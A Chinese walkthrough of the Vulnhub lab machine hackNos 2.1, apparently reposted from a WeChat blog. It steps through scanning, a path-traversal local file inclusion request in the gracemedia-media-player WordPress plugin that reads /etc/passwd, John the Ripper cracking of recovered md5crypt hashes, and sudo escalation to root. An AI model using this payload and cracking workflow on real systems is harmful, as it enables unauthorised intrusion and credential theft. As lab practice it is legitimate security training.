今天实践的是vulnhub的hacknos 2.1镜像,这是vulnhub系列阶段性的最后一个镜像,断断续续三年,终于把存货清空了,
用workstation导入成功,但扫描不到地址,重新用virtualbox导入,
再次地址扫描,sudo netdiscover -r 192.168.1.0/24,
确认一下是192.168.1.107,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.107,
再接着做web目录爆破,sudo dirb http://192.168.1.107,
浏览器访问http://192.168.1.107/tsweb,
发现是wordpress,扫一下都有哪些插件,
sudo wpscan --url http://192.168.1.107/tsweb --enumerate ap,
网上搜一下gracemedia-media-player 1.0,
看来是有本地文件包含漏洞,
从https://www.exploit-db.com/exploits/46537查到漏洞利用方法,
访问http://192.168.1.107/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd,
发现flag用户,密码的hash是$1$flag$vqjCxzjtRc7PofLYS2lWf/,
$1$代表hash算法是md5,密码hash放到文件里,做一下爆破,
sudo john --format=md5crypt --wordlist=/usr/share/wordlists/rockyou.txt hash,
就得到了账户密码对flag/topsecret,ssh登录一下,
发现/home下有rohit用户,并在/var/backups/passbkp/md5-hash发现密码hash,$1$rohit$01Dl0NQKtgfeL08fGrggi0,继续爆破,
得到账户密码对rohit/!%hack41,切用户,发现可以sudo到root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之hacknos 2.1的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论